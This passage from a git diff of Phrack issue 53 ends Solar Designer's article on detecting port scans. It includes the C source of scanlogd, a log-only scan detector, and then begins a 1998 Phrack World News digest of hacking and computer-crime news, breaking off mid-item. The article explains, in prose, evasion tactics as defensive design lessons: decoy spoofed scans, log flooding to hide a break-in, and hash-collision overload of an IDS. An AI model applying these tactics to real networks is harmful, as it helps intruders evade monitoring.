+A way to hide the origin of a scan, while still receiving the information,
+is to send a large amount (say, 999) of spoofed "port scans", and only on
+scan from the real source address.  Even if all the scans (1000 of them) are
+detected and logged, there's no way to tell which of the source addresses is
+real.  All we can tell is that we've been port scanned.
+
+Note that, while these attacks are possible, they obviously require more
+resources from the attacker to perform.  Some attackers will likely choose
+not to use such complicated and/or slow attacks, and others will have to
+pay with their time.  This alone is enough reason to still detect at least
+some port scans (the ones that are detectable).
+
+The possibility of such attacks means that our goal is not to detect all
+port scans (which is impossible), but instead, in my opinion, to detect
+as many port scan kinds as possible while still being reliable enough.
+
+
+----[  What Information Can We Trust?
+
+Obviously, the source address can be spoofed, so we can't trust it unless
+other evidence is available.  However, port scanners sometimes leak extra
+information that can be used to tell something about the real origin of a
+spoofed port scan.
+
+For example, if the packets we receive have an IP TTL of 255 at our end, we
+know for sure that they're being sent from our local network regardless of
+what the source address field says.  However, if TTL is 250, we can only tell
+that the attacker was no more than 5 hops away, we can't tell how far exactly
+she was for sure.
+
+Starting TTL and source port number(s) can also give us a hint of what
+port scanner type (for "stealth" scans) or operating system (for full TCP
+connection scans) is used by the attacker.  We can never be sure though.
+For example, nmap sets TTL to 255 and source port to 49724, while Linux
+kernel sets TTL to 64.
+
+
+----[  Information Source (E-box) Choice
+
+For detecting TCP port scans, including "stealth" ones, we need access
+to raw IP and TCP packet headers.
+
+In a network-based IDS, we would use promiscuous mode for obtaining the
+raw packets.  This has all the problems described in the SNI paper: both
+false positives and false negatives are possible.  However, sometimes
+this might be acceptable for this attack type since it is impossible to
+detect all port scans anyway.
+
+For a host-based IDS, there are two major ways of obtaining the packets:
+reading from a raw TCP or IP socket, or getting the data directly inside
+the kernel (via a loadable module or a kernel patch).
+
+When using a raw TCP socket, most of the problems pointed out by SNI do
+not apply: we are only getting the packets recognized by our own kernel.
+However, this is still passive analysis (we might miss packets) and a
+fail-open system.  While probably acceptable for port scans only, this
+is not a good design if we later choose to detect other attacks.  If we
+used a raw IP socket instead (some systems don't have raw TCP sockets),
+we would have more of the "SNI problems" again.  Anyway, in my example
+code, I'm using a raw TCP socket.
+
+The most reliable IDS is one with some support from the target systems
+kernel.  This has access to all the required information, and can even be
+fail-close.  The obvious disadvantage is that kernel modules and patches
+aren't very portable.
+
+
+----[  Attack Signature (A-box) Choice
+
+It has already been mentioned above that different signatures can be
+used to detect port scans; they differ by numbers of false positives
+and false negatives.  The attack signature that we choose should keep
+false positives as low as possible while still keeping false negatives
+reasonably low.  It is however not obvious what to consider reasonable.
+In my opinion, this should depend on the severity of the attack we're
+detecting (the cost of a false negative), and on the actions taken for
+a detected attack (the cost of a false positive).  Both of these costs
+can differ from site to site, so an IDS should be user-tunable.
+
+For scanlogd, I'm using the following attack signature: "at least COUNT
+ports need to be scanned from the same source address, with no longer
+than DELAY ticks between ports".  Both COUNT and DELAY are configurable.
+A TCP port is considered to be scanned when receiving a packet without
+the ACK bit set.
+
+
+----[  Logging the Results (D-box)
+
+Regardless of where we write our logs (a disk file, a remote system, or
+maybe even a printer), our space is limited.  When storage is full, results
+will get lost.  Most likely, either the logging stops, or old entries get
+replaced with newer ones.
+
+An obvious attack is to fill up the logs with unimportant information,
+and then do the real attack with the IDS effectively disabled.  For the
+port scans example, spoofed "port scans" could be used to fill up the
+logs, and the real attack could be a real port scan, possibly followed
+by a breakin.  This example shows how a badly coded port scan detection
+tool could be used to avoid logging of the breakin attempt, which would
+get logged if the tool wasn't running.
+
+One solution for this problem would be to put rate limits (say, no more
+than 5 messages per 20 seconds) on every attack type separately, and,
+when the limit is reached, log this fact, and temporarily stop logging
+of attacks of this type.  For attack types that can't be spoofed, such
+limits could be put per source address instead.  Since port scans can be
+spoofed, this still lets an attacker not reveal her real address, but
+this doesn't let her hide another attack type this way, like she could
+do if we didn't implement the rate limits... that's life.  This is what
+I implemented in scanlogd.
+
+Another solution, which has similar advantages and disadvantages, is to
+allocate space for messages from every attack type separately.  Both of
+these solutions can be implemented simultaneously.
+
+
+----[  What To Do About Port Scans? (R-box)
+
+Some IDS are capable of responding to attacks they detect.  The actions
+are usually directed to prevent further attacks and/or to obtain extra
+information about the attacker.  Unfortunately, these features can often
+be abused by a smart attacker.
+
+A typical action is to block the attacking host (re-configuring access
+lists of the firewall, or similar).  This leads to an obvious Denial of
+Service (DoS) vulnerability if the attack we're detecting is spoofable
+(like a port scan is).  It is probably less obvious that this leads to DoS
+vulnerabilities for non-spoofable attack types, too.  That's because IP
+addresses are sometimes shared between many people; this is the case for
+ISP shell servers and dynamic dialup pools.
+
+There are also a few implementation problems with this approach: firewall
+access lists, routing tables, etc... are all of a limited size.  Also, even
+before the limit is reached, there are CPU usage issues.  If an IDS is not
+aware of these issues, this can lead to DoS of the entire network (say,
+if the firewall goes down).
+
+In my opinion, there're only very few cases in which such an action might
+be justified.  Port scans are definitely not among those.
+
+Another common action is to connect back to the attacking host to obtain
+extra information.  For spoofable attacks, we might end up being used in
+attacking a third-party.  We'd better not do anything for such attacks,
+including port scans.
+
+However, for non-spoofable attacks, this might be worth implementing in
+some cases, with a lot of precautions.  Mainly, we should be careful not
+to consume too many resources, including bandwidth (should limit request
+rate regardless of the attack rate, and limit the data size), CPU time,
+and memory (should have a timeout, and limit the number of requests that
+we do at a time).  Obviously, this means that an attacker can still make
+some of the requests fail, but there's nothing we can do here.
+
+See ftp://ftp.win.tue.nl/pub/security/murphy.ps.gz for an example of the
+issues involved.  This paper by Wietse Venema details similar vulnerabilities
+in older versions of his famous TCP wrapper package.
+
+For these reasons, scanlogd doesn't do anything but log port scans.  You
+should probably take action yourself.  What exactly you do is a matter
+of taste; I personally only check my larger logs (that I'm not checking
+normally) for activity near the port scan time.
+
+
+----[  Data Structures and Algorithm Choice
+
+When choosing a sorting or data lookup algorithm to be used for a normal
+application, people are usually optimizing the typical case.  However, for
+IDS the worst case scenario should always be considered: an attacker can
+supply our IDS with whatever data she likes.  If the IDS is fail-open, she
+would then be able to bypass it, and if it's fail-close, she could cause
+a DoS for the entire protected system.
+
+Let me illustrate this by an example.  In scanlogd, I'm using a hash table
+to lookup source addresses.  This works very well for the typical case as
+long as the hash table is large enough (since the number of addresses we
+keep is limited anyway).  The average lookup time is better than that of a
+binary search.  However, an attacker can choose her addresses (most likely
+spoofed) to cause hash collisions, effectively replacing the hash table
+lookup with a linear search.  Depending on how many entries we keep, this
+might make scanlogd not be able to pick new packets up in time.  This will
+also always take more CPU time from other processes in a host-based IDS
+like scanlogd.
+
+I've solved this problem by limiting the number of hash collisions, and
+discarding the oldest entry with the same hash value when the limit is
+reached.  This is acceptable for port scans (remember, we can't detect all
+scans anyway), but might not be acceptable for detecting other attacks.
+If we were going to support some other attack type also, we would have to
+switch to a different algorithm instead, like a binary search.
+
+If we're using a memory manager (such as malloc(3) and free(3) from our
+libc), an attacker might be able to exploit its weaknesses in a similar
+way.  This might include CPU usage issues and memory leaks because of not
+being able to do garbage collection efficiently enough.  A reliable IDS
+should have its very own memory manager (the one in libc can differ from
+system to system), and be extremely careful with its memory allocations.
+For a tool as simple as scanlogd is, I simply decided not to allocate any
+memory dynamically at all.
+
+It is probably worth mentioning that similar issues also apply to things
+like operating system kernels.  For example, hash tables are widely used
+there for looking up active connections, listening ports, etc.  There're
+usually other limits which make these not really dangerous though, but
+more research might be needed.
+
+
+----[  IDS and Other Processes
+
+For network-based IDS that are installed on a general-purpose operating
+system, and for all host-based IDS, there's some interaction of the IDS
+with the rest of the system, including other processes and the kernel.
+
+Some DoS vulnerabilities in the operating system might allow an attacker
+to disable the IDS (of course, only if it is fail-open) without it ever
+noticing.  This can be done via vulnerabilities in both the kernel (like
+"teardrop") and in other processes (like having a UDP service enabled in
+inetd without a connection count limit and any resource limits).
+
+Similarly, a poorly coded host-based IDS can be used for DoS attacks on
+other processes of the "protected" system.
+
+
+----[  Example Code
+
+Finally, here you get scanlogd for Linux.  It may compile on other systems
+too, but will likely not work because of the lack of raw TCP sockets.  For
+future versions see http://www.false.com/security/scanlogd/.
+
+NOTE THAT SOURCE ADDRESSES REPORTED CAN BE SPOOFED, DON'T TAKE ANY ACTION
+AGAINST THE ATTACKER UNLESS OTHER EVIDENCE IS AVAILABLE.
+
+<++> Scanlogd/scanlogd.c
+/*
+ * Linux scanlogd v1.0 by Solar Designer.  You're allowed to do whatever you
+ * like with this software (including re-distribution in any form, with or
+ * without modification), provided that credit is given where it is due, and
+ * any modified versions are marked as such.  There's absolutely no warranty.
+ */
+
+#include <stdio.h>
+#include <unistd.h>
+#include <signal.h>
+#include <string.h>
+#include <ctype.h>
+#include <time.h>
+#include <syslog.h>
+#include <sys/times.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in_systm.h>
+#include <netinet/in.h>
+#if (linux)
+#define __BSD_SOURCE
+#endif
+#include <netinet/ip.h>
+#include <netinet/tcp.h>
+#include <arpa/inet.h>
+
+/*
+ * Port scan detection thresholds: at least COUNT ports need to be scanned
+ * from the same source, with no longer than DELAY ticks between ports.
+ */
+#define SCAN_COUNT_THRESHOLD		10
+#define SCAN_DELAY_THRESHOLD		(CLK_TCK * 5)
+
+/*
+ * Log flood detection thresholds: temporarily stop logging if more than
+ * COUNT port scans are detected with no longer than DELAY between them.
+ */
+#define LOG_COUNT_THRESHOLD		5
+#define LOG_DELAY_THRESHOLD		(CLK_TCK * 20)
+
+/*
+ * You might want to adjust these for using your tiny append-only log file.
+ */
+#define SYSLOG_IDENT			"scanlogd"
+#define SYSLOG_FACILITY			LOG_DAEMON
+#define SYSLOG_LEVEL			LOG_ALERT
+
+/*
+ * Keep track of up to LIST_SIZE source addresses, using a hash table of
+ * HASH_SIZE entries for faster lookups, but limiting hash collisions to
+ * HASH_MAX source addresses per the same hash value.
+ */
+#define LIST_SIZE			0x400
+#define HASH_LOG			11
+#define HASH_SIZE			(1 << HASH_LOG)
+#define HASH_MAX			0x10
+
+/*
+ * Packet header as read from a raw TCP socket. In reality, the TCP header
+ * can be at a different offset; this is just to get the total size right.
+ */
+struct header {
+	struct ip ip;
+	struct tcphdr tcp;
+	char space[60 - sizeof(struct ip)];
+};
+
+/*
+ * Information we keep per each source address.
+ */
+struct host {
+	struct host *next;		/* Next entry with the same hash */
+	clock_t timestamp;		/* Last update time */
+	time_t start;			/* Entry creation time */
+	struct in_addr saddr, daddr;	/* Source and destination addresses */
+	unsigned short sport;		/* Source port, if fixed */
+	int count;			/* Number of ports in the list */
+	unsigned short ports[SCAN_COUNT_THRESHOLD - 1];	/* List of ports */
+	unsigned char flags_or;		/* TCP flags OR mask */
+	unsigned char flags_and;	/* TCP flags AND mask */
+	unsigned char ttl;		/* TTL, if fixed */
+};
+
+/*
+ * State information.
+ */
+struct {
+	struct host list[LIST_SIZE];	/* List of source addresses */
+	struct host *hash[HASH_SIZE];	/* Hash: pointers into the list */
+	int index;			/* Oldest entry to be replaced */
+} state;
+
+/*
+ * Convert an IP address into a hash table index.
+ */
+int hashfunc(struct in_addr addr)
+{
+	unsigned int value;
+	int hash;
+
+	value = addr.s_addr;
+	hash = 0;
+	do {
+		hash ^= value;
+	} while ((value >>= HASH_LOG));
+
+	return hash & (HASH_SIZE - 1);
+}
+
+/*
+ * Log this port scan.
+ */
+void do_log(struct host *info)
+{
+	char s_saddr[32];
+	char s_daddr[32 + 8 * SCAN_COUNT_THRESHOLD];
+	char s_flags[8];
+	char s_ttl[16];
+	char s_time[32];
+	int index, size;
+	unsigned char mask;
+
+/* Source address and port number, if fixed */
+	snprintf(s_saddr, sizeof(s_saddr),
+		info->sport ? "%s:%u" : "%s",
+		inet_ntoa(info->saddr),
+		(unsigned int)ntohs(info->sport));
+
+/* Destination address, if fixed */
+	size = snprintf(s_daddr, sizeof(s_daddr),
+		info->daddr.s_addr ? "%s ports " : "ports ",
+		inet_ntoa(info->daddr));
+
+/* Scanned port numbers */
+	for (index = 0; index < info->count; index++)
+		size += snprintf(s_daddr + size, sizeof(s_daddr) - size,
+			"%u, ", (unsigned int)ntohs(info->ports[index]));
+
+/* TCP flags: lowercase letters for "always clear", uppercase for "always
+ * set", and question marks for "sometimes set". */
+	for (index = 0; index < 6; index++) {
+		mask = 1 << index;
+		if ((info->flags_or & mask) == (info->flags_and & mask)) {
+			s_flags[index] = "fsrpau"[index];
+			if (info->flags_or & mask)
+				s_flags[index] = toupper(s_flags[index]);
+		} else
+			s_flags[index] = '?';
+	}
+	s_flags[index] = 0;
+
+/* TTL, if fixed */
+	snprintf(s_ttl, sizeof(s_ttl), info->ttl ? ", TTL %u" : "",
+		(unsigned int)info->ttl);
+
+/* Scan start time */
+	strftime(s_time, sizeof(s_time), "%X", localtime(&info->start));
+
+/* Log it all */
+	syslog(SYSLOG_LEVEL,
+		"From %s to %s..., flags %s%s, started at %s",
+		s_saddr, s_daddr, s_flags, s_ttl, s_time);
+}
+
+/*
+ * Log this port scan unless we're being flooded.
+ */
+void safe_log(struct host *info)
+{
+	static clock_t last = 0;
+	static int count = 0;
+	clock_t now;
+
+	now = info->timestamp;
+	if (now - last > LOG_DELAY_THRESHOLD || now < last) count = 0;
+	if (++count <= LOG_COUNT_THRESHOLD + 1) last = now;
+
+	if (count <= LOG_COUNT_THRESHOLD) {
+		do_log(info);
+	} else if (count == LOG_COUNT_THRESHOLD + 1) {
+		syslog(SYSLOG_LEVEL, "More possible port scans follow.\n");
+	}
+}
+
+/*
+ * Process a TCP packet.
+ */
+void process_packet(struct header *packet, int size)
+{
+	struct ip *ip;
+	struct tcphdr *tcp;
+	struct in_addr addr;
+	unsigned short port;
+	unsigned char flags;
+	struct tms buf;
+	clock_t now;
+	struct host *current, *last, **head;
+	int hash, index, count;
+
+/* Get the IP and TCP headers */
+	ip = &packet->ip;
+	tcp = (struct tcphdr *)((char *)packet + ((int)ip->ip_hl << 2));
+
+/* Sanity check */
+	if ((char *)tcp + sizeof(struct tcphdr) > (char *)packet + size)
+		return;
+
+/* Get the source address, destination port, and TCP flags */
+	addr = ip->ip_src;
+	port = tcp->th_dport;
+	flags = tcp->th_flags;
+
+/* We're using IP address 0.0.0.0 for a special purpose here, so don't let
+ * them spoof us. */
+	if (!addr.s_addr) return;
+
+/* Use times(2) here not to depend on someone setting the time while we're
+ * running; we need to be careful with possible return value overflows. */
+	now = times(&buf);
+
+/* Do we know this source address already? */
+	count = 0;
+	last = NULL;
+	if ((current = *(head = &state.hash[hash = hashfunc(addr)])))
+	do {
+		if (current->saddr.s_addr == addr.s_addr) break;
+		count++;
+		if (current->next) last = current;
+	} while ((current = current->next));
+
+/* We know this address, and the entry isn't too old. Update it. */
+	if (current)
+	if (now - current->timestamp <= SCAN_DELAY_THRESHOLD &&
+	    now >= current->timestamp) {
+/* Just update the TCP flags if we've seen this port already */
+		for (index = 0; index < current->count; index++)
+		if (current->ports[index] == port) {
+			current->flags_or |= flags;
+			current->flags_and &= flags;
+			return;
+		}
+
+/* ACK to a new port? This could be an outgoing connection. */
+		if (flags & TH_ACK) return;
+
+/* Packet to a new port, and not ACK: update the timestamp */
+		current->timestamp = now;
+
+/* Logged this scan already? Then leave. */
+		if (current->count == SCAN_COUNT_THRESHOLD) return;
+
+/* Update the TCP flags */
+		current->flags_or |= flags;
+		current->flags_and &= flags;
+
+/* Zero out the destination address, source port and TTL if not fixed. */
+		if (current->daddr.s_addr != ip->ip_dst.s_addr)
+			current->daddr.s_addr = 0;
+		if (current->sport != tcp->th_sport)
+			current->sport = 0;
+		if (current->ttl != ip->ip_ttl)
+			current->ttl = 0;
+
+/* Got enough destination ports to decide that this is a scan? Then log it. */
+		if (current->count == SCAN_COUNT_THRESHOLD - 1) {
+			safe_log(current);
+			current->count++;
+			return;
+		}
+
+/* Remember the new port */
+		current->ports[current->count++] = port;
+
+		return;
+	}
+
+/* We know this address, but the entry is outdated. Mark it unused, and
+ * remove from the hash table. We'll allocate a new entry instead since
+ * this one might get re-used too soon. */
+	if (current) {
+		current->saddr.s_addr = 0;
+
+		if (last)
+			last->next = last->next->next;
+		else if (*head)
+			*head = (*head)->next;
+		last = NULL;
+	}
+
+/* We don't need an ACK from a new source address */
+	if (flags & TH_ACK) return;
+
+/* Got too many source addresses with the same hash value? Then remove the
+ * oldest one from the hash table, so that they can't take too much of our
+ * CPU time even with carefully chosen spoofed IP addresses. */
+	if (count >= HASH_MAX && last) last->next = NULL;
+
+/* We're going to re-use the oldest list entry, so remove it from the hash
+ * table first (if it is really already in use, and isn't removed from the
+ * hash table already because of the HASH_MAX check above). */
+
+/* First, find it */
+	if (state.list[state.index].saddr.s_addr)
+		head = &state.hash[hashfunc(state.list[state.index].saddr)];
+	else
+		head = &last;
+	last = NULL;
+	if ((current = *head))
+	do {
+		if (current == &state.list[state.index]) break;
+		last = current;
+	} while ((current = current->next));
+
+/* Then, remove it */
+	if (current) {
+		if (last)
+			last->next = last->next->next;
+		else if (*head)
+			*head = (*head)->next;
+	}
+
+/* Get our list entry */
+	current = &state.list[state.index++];
+	if (state.index >= LIST_SIZE) state.index = 0;
+
+/* Link it into the hash table */
+	head = &state.hash[hash];
+	current->next = *head;
+	*head = current;
+
+/* And fill in the fields */
+	current->timestamp = now;
+	current->start = time(NULL);
+	current->saddr = addr;
+	current->daddr = ip->ip_dst;
+	current->sport = tcp->th_sport;
+	current->count = 1;
+	current->ports[0] = port;
+	current->flags_or = current->flags_and = flags;
+	current->ttl = ip->ip_ttl;
+}
+
+/*
+ * Hmm, what could this be?
+ */
+int main()
+{
+	int raw, size;
+	struct header packet;
+
+/* Get a raw socket. We could drop root right after that. */
+	if ((raw = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) {
+		perror("socket");
+		return 1;
+	}
+
+/* Become a daemon */
+	switch (fork()) {
+	case -1:
+		perror("fork");
+		return 1;
+
+	case 0:
+		break;
+
+	default:
+		return 0;
+	}
+
+	signal(SIGHUP, SIG_IGN);
+
+/* Initialize the state. All source IP addresses are set to 0.0.0.0, which
+ * means the list entries aren't in use yet. */
+	memset(&state, 0, sizeof(state));
+
+/* Huh? */
+	openlog(SYSLOG_IDENT, 0, SYSLOG_FACILITY);
+
+/* Let's start */
+	while (1)
+	if ((size = read(raw, &packet, sizeof(packet))) >= sizeof(packet.ip))
+		process_packet(&packet, size);
+}
+<-->
diff --git a/phrack53/14.txt b/phrack53/14.txt
new file mode 100644
index 0000000..b040b11
--- /dev/null
+++ b/phrack53/14.txt
@@ -0,0 +1,2222 @@
+---[  Phrack Magazine   Volume 8, Issue 53 July 8, 1998, article 14 of 15
+
+
+-------------------------[  P H R A C K     W O R L D     N E W S
+
+
+--------[  Issue 53
+
+Hi.  A few changes have been made to Phrack World News (PWN).  Because of
+the increase of news on the net, security, hackers and other PWN topics,
+it is getting more difficult to keep Phrack readers informed of everything.
+To combat this problem, PWN will include more articles, but only relevant
+portions (or the parts I want to make smart ass remarks about).  If you would
+like to read the full article, look through the ISN (InfoSec News) archives
+located at:
+
+        ftp.sekurity.org        /pub/text/isn
+        ftp.repsec.com          /pub/text/digests/isn
+
+The following articles have been accumulated from a wide variety of places.
+When known, original source/author/date has been included.  If the information
+is absent, then it wasn't sent to us.  If you wish to receive more news, the
+ISN mail list caters to this.  For more information, mail
+majordomo@sekurity.org with "info isn".  To subscribe, mail
+majordomo@sekurity.org with "subscribe isn" in the body of the mail.
+
+As usual, I am putting some of my own comments in brackets to help readers
+realize a few things left out of the articles.  Comments are my own, and
+do not necessarily represent the views of Phrack, journalists, government
+spooks, my cat, or anyone else.  Bye.
+
+    - disorder
+
+
+0x1:  Identifying Net Criminals Difficult
+0x2:  "The Eight" meet to combat high-tech crime
+0x3:  Fired Forbes Technician Charged With Sabotage
+0x4:  Internet Industry Asked to Police Itself
+0x5:  Internet may be Hackers Best Friend
+0x6:  Hacker Cripples Airport Tower
+0x7:  Profits Embolden Hackers
+0x8:  Cyberattacks spur new warning system
+0x9:  <pure lameness>
+0xa:  IBM's Ethical Hackers Broke In!
+0xb:  Two accused of conspiring to hack into CWRU system
+0xc:  FBI Warns of Big Increase In On-line Crime
+0xd:  Computer hacker jailed for 18 months
+0xe:  Afternoon Line
+0xf:  Hacking Geniuses or Monkeys
+0x10: Low Tech Spooks - Corporate Spies
+0x11: 'White Hat' Hackers Probe Pores in Computer Security Blankets
+0x12: 101 Ways to Hack into Windows NT
+0x13: Suspected NASA Hacker Nabbed
+0x14: CEOs Hear the Unpleasant Truth about Computer Security
+0x15: Codebreakers
+0x16: Hackers Could Disable Military
+0x17: Secret Service Hackers Can't Crack Internet
+0x18: Now Hiring: Hackers (Tattoos Welcome)
+0x19: Hacker Stoppers?
+0x1a: Hackers' Dark Side Gets Even Darker
+0x1b: Japan Fears It's Becoming a Base for Hackers
+0x1c: Kevin Mitnick Hacker Case Drags On and On
+0x1d: Millions Lost to Phone Hackers
+0x1e: Hackers on the Hill
+0x1f: RSA Sues Network Associates
+0x20: Clinton to Outline Cyberthreat Policy
+0x21: Programmer Sentenced for Military Computer Intrusion
+0x22: Editorial - Hacker vs Cracker, Revisited
+0x23: Windows NT Security Under Fire
+0x24: New Decoy Technology Designed to Sting Hackers
+0x25: Reno dedicates high-tech crime fighting center
+0x26: Man poses as astronaut steals NASA secrets
+
+0x27: Convention: Defcon 6.0
+0x28: Convention: Network Security Solutions July Event
+0x29: Convention: 8th USENIX Security Symposium
+0x2a: Convention: RAID 98
+0x2b: Convention: Computer Security Area (ASC) / DGSCA 98
+0x2c: Convention: InfoWarCon-9
+
+
+0x1>-------------------------------------------------------------------------
+
+Title: Identifying Net Criminals Difficult
+Source: 7Pillars Partners
+Author: David Plotnikoff (Mercury News Staff Writer)
+Date: 10:12 p.m. PST Sunday, March 8, 1998
+
+[snip...]
+
+What began as an innocent chat-room flirtation isn't so innocent anymore.
+The last e-mail message you received began: ``I know where you live. I
+know where you work. I know where your kids go to day care. . . .''
+Potential loss: Your life. 
+
+There is no way to calculate how many hundreds or thousands of times each
+day the Net brings crime into some unsuspecting person's life. But a
+report released by the Computer Security Institute found that nearly
+two-thirds of the 520 corporations, government offices, financial
+institutions and universities queried had experienced electronic break-ins
+or other security breaches in the past 12 months. 
+
+Although fewer than half the companies assigned a dollar amount to their
+losses, the estimated total from those that did is staggering: $236
+million for the last two years. 
+
+[More estimates on losses, no doubt from accurate estimations
+ by professionals.]
+
+[snip...]
+
+But those charged with enforcing the law in cyberspace say the vast
+majority of Net-borne crime never reaches the criminal justice system. And
+in the relatively few instances where a crime is reported, most often the
+criminal's true identity is never found. 
+
+The San Jose Police Department's elite high-tech crimes unit is every
+citizen's first line of defense when trouble comes down the wire in the
+capital city of Silicon Valley. But today, four years after the explosion
+of the Internet as a mass market, even the top technology-crimes police
+unit in the country finds itself with just a handful of Internet crimes to
+investigate. 
+
+[Wait... they say criminals get away with everything, then call the
+ Police an "elite" high-tech crimes unit?]
+
+[snip...]
+
+The Internet slice of the job -- chasing down hackers, stalkers and
+assorted scammers -- is too small to even keep statistics on. When pressed
+for a guess, Sgt. Don Brister, the unit's supervisor, estimates that
+Internet and online-service crimes make up ``probably no more than 3 or 4
+percent'' of the team's workload. 
+
+[snip...]
+
+While most Net crimes are actually old crimes -- stalking, harassment,
+fraud and theft -- in a new venue, there is at least one criminal act
+entirely native to cyberia: ``denial of service'' attacks. 
+
+[Route, you're such a criminal.]
+
+[snip...]
+
+``The scary part,'' Lowry says, ``is we know the storm is coming, but we
+don't know exactly what shape it's going to take. The scale is huge. . . .
+You're sitting on this beach, knowing it's going to hit, but you don't
+know what it is or when it's going to hit.''
+
+0x2>-------------------------------------------------------------------------
+
+Title: "The Eight" meet to combat high-tech crime
+Date: Jan 1998
+
+   Recently, U.S. Attorney General Janet Reno hosted a historic meeting of
+Justice and Interior officials from the countries that constitute "the
+Eight" on ways to combat international computer crime. (Formerly dubbed
+the G-7, the group now includes Russia along with the United Kingdom,
+France, Germany, Italy, Canada, Japan, and the U.S.) 
+   
+   The meeting was the first of its kind and resulted in an agreement
+endorsing ten principles, such as "Investigation and prosecution of
+international high-tech crimes must be coordinated among all concerned
+states, regardless of where harm has occurred;" and adopting a ten-point
+action plan, for example, "Use our established network of knowledgeable
+personnel to ensure a timely, effective response to transnational
+high-tech cases and designate a point-of-contract who is available on a 24
+hour basis." 
+   
+The full text will be available at http://www.usdoj.gov.
+
+0x3>-------------------------------------------------------------------------
+
+Title: Fired Forbes Technician Charged With Sabotage
+Source: Dow Jones News Service
+Date: 11/25/97
+
+
+A temporary staff computer technician has been charged with breaking into
+the computer system of Forbes, Inc., publisher of Forbes magazine, and
+causing a computer crash that cost the company more than $100,000. 
+
+  According to the complaint against George Mario Parente, the sabotage
+left hundreds of Forbes employees unable to perform server-related
+functions for a full day and caused many employees to lose a day's worth
+of data. If convicted, Parente faces up to five years in prison and a
+maximum fine of $250,000. 
+
+
+0x4>-------------------------------------------------------------------------
+
+Title: Internet Industry Asked to Police Itself
+
+
+SEATTLE -- The Internet industry had better police itself or it will face
+renewed threats of government regulation, participants said Wednesday at a
+Seattle conference of technology leaders from throughout North America as
+well as Europe and Japan. 
+
+[And they've done such a good job so far, with legislation like the CDA
+ and WIPO... sure, we can trust the government to do the right thing.]
+
+[snip...]
+
+Balkam warned that Arizona Sen. John McCain plans hearings next month on
+the topic, and that Indiana Sen. Dan Coats plans to introduce a new
+content-regulation bill designed to avoid the problems that caused the
+Supreme Court to reject the first one. 
+
+[Everyone keep your eyes peeled.]
+
+Wednesday's discussion was well-timed; the conference will hear Thursday
+from President Clinton's Internet czar, Ira Magaziner, who is expected to
+deliver a stern admonition that government won't hesitate to step in if
+the industry's own efforts fall short. 
+
+Sponsored by GTE, Telus Corp. and the Discovery Institute, the program
+also included Rep. Rick White, R-Washington, founder of the Congressional
+Internet Caucus and Rob Glaser, founder of Seattle-based RealNetworks and
+a proponent of the Internet as the ``next mass medium.''
+
+While Wednesday's sessions focused on content regulation, Thursday's deal
+more with electronic commerce and such issues as privacy, authentication
+and legal jurisdiction. 
+
+Effective self-regulation has several keys, said Jim Miller, architect of
+a system known as PICS, the Platform for Internet Content Selection. 
+
+[snip...]
+
+0x5>-------------------------------------------------------------------------
+
+Title: Internet may be Hackers Best Friend
+
+The Internet may be the computer hacker's best friend. The international
+computer network has made the sharing of sophisticated break-in tools
+easier, computer security experts say. 
+
+[But they don't mention the sharing of security information, or the fact
+ that the experts can subscribe to the same 'hacker' sharing sources.]
+
+[snip...]
+
+A report released Wednesday by the Computer Security Institute noted that
+while both external and internal computer crime is on the rise, the
+greatest losses result from unauthorized access by insiders. 
+
+``Those are the attacks that cause tens of millions of dollars,'' Power
+said. 
+
+But it's still the outside jobs that grab headlines. A Defense Department
+official last week termed the attack linked to the young hackers ``the
+most organized and systematic attack the Pentagon has seen to date.''
+
+[snip...]
+
+0x6>-------------------------------------------------------------------------
+
+Title: Hacker Cripples Airport Tower
+
+A juvenile hacker who crippled an airport tower for six hours, damaged a
+town's phone system, and broke into pharmacy records has been charged in a
+first-ever federal prosecution, the U.S. Attorney's office announced
+today. 
+
+But in a plea bargain, the juvenile will serve no jail time, the
+government announced. 
+
+The incidents occurred in early 1997, but the federal criminal charges
+were unsealed just today. The government said it was the first federal
+prosecution ever of a minor for a computer crime. 
+
+According to U.S. Attorney Donald K. Stern, the hacker disabled a key
+telephone company computer servicing the Worcester airport, roughly 45
+miles southwest of Boston. 
+
+"As a result of a series of commands sent from the hacker's personal
+computer, vital services to the FAA control tower were disabled for six
+hours in March of 1997," a release from Stern's office said. 
+
+[So the FAA routes vital tower control through the PSTN? Scary...]
+
+[snip...]
+
+The plea agreement sentences the juvenile to two years' probation, "during
+which he may not possess or use a modem or other means of remotely
+accessing a computer or computer network directly or indirectly,"
+according to Stern
+
+In addition, he must pay restitution to the telephone company and complete
+250 hours of community service. He has been required to forfeit all of the
+computer equipment used during his criminal activity. 
+
+[snip...]
+
+"Public health and safety were threatened by the outage, which resulted in
+the loss of telephone service, until approximately 3:30 p.m., to the
+Federal Aviation Administration Tower at the Worcester Airport, to the
+Worcester Airport Fire Department, and to other related concerns such as
+airport security, the weather service, and various private air freight
+companies. 
+
+"Further, as a result of the outage, both the main radio transmitter,
+which is connected to the tower by the loop carrier system, and a circuit,
+which enables aircraft to send an electric signal to activate the runway
+lights on approach, were not operational for this same period of time." 
+
+[NICE design guys... real nice.]
+
+[snip...]
+
+0x7>-------------------------------------------------------------------------
+
+Title: Profits Embolden Hackers
+Source: InternetWeek
+Author: Tim Wilson
+
+Conventional wisdom says that most IT security threats come from inside
+the company, not outside. Any guess who's reaping the greatest benefit
+from that little piece of wisdom? 
+
+Hackers and computer criminals.
+
+In two separate studies completed this month, Fortune 1000 companies
+reported more financial losses due to computer vandalism and espionage in
+1997 than they ever experienced before. Several corporations said they
+lost $10 million or more in a single break-in. And reports of system
+break-ins at the Computer Emergency Response Team site are the highest
+they've ever been. 
+
+Despite recent security product and technology developments, computer
+networks are becoming more vulnerable to outside attack, not less. 
+
+[Woohoo!]
+
+[snip...]
+
+"I know about 95 percent of [the vulnerabilities] I am going to find at a
+company before I even get there," said Ira Winkler, president of the
+Information Security Advisory Group -- a firm that specializes in
+penetrating business security systems to expose vulnerabilities -- and
+author of the book Corporate Espionage. "I can steal a billion dollars
+from any [corporation] within a couple of hours." 
+
+[One trick pony...]
+
+[snip...]
+
+In a study to be published next month, WarRoom Research found that the
+vast majority of Fortune 1000 companies have experienced a successful
+break-in by an outsider in the past year. More than half of those
+companies have experienced more than 30 system penetrations in the past 12
+months. Nearly 60 percent said they lost $200,000 or more as a result of
+each intrusion. 
+
+In a separate study published earlier this month by the Computer Security
+Institute and the FBI, 520 U.S. companies reported a total loss of $136
+million from computer crime and security breaches in 1997, an increase of
+36 percent from the year before. The Internet was cited by 54 percent of
